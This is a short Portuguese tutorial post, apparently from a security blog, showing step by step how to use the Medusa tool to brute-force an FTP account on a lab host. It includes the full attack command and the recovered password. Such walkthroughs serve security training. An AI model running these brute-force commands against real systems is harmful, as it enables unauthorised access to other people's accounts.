Medusa — Brute Force Attack
0
0

Medusa — Brute Force Attack

Marcos Henrique
0 min
0
0
Email image

Medusa é uma ferramenta de brute force para a realização de ataques remotos, possui diversos módulos para realizar ataques.

Site: foofus.net

01 — Passo

Listar módulos disponíveis para ataque, neste exemplo iremos utilizar o módulo FTP.

medusa : Ferramenta.
-q : Lista os módulos disponíveis.

medusa -q | more

Email image

02 — Passo

Crie o arquivo senhas.txt contendo possíveis senhas.

cat senhas.txt

Email image

03 — Passo

Realizando o ataque, como segue abaixo a senha do usuário 100security foi revelada : 123456.

-h : Define o host alvo.
-u : Define o usuário a ser atacado.
-P : Define o arquivo Wordlist.
-M : Define o módulo.

medusa -h 10.10.10.123 -u 100security -P senhas.txt -M ftp

Email image

04 — Passo

Acesso ao ftp com o usuário 100security e senha 123456.

ftp 10.10.10.123

Email image

Fonte: https://www.100security.com.br/medusa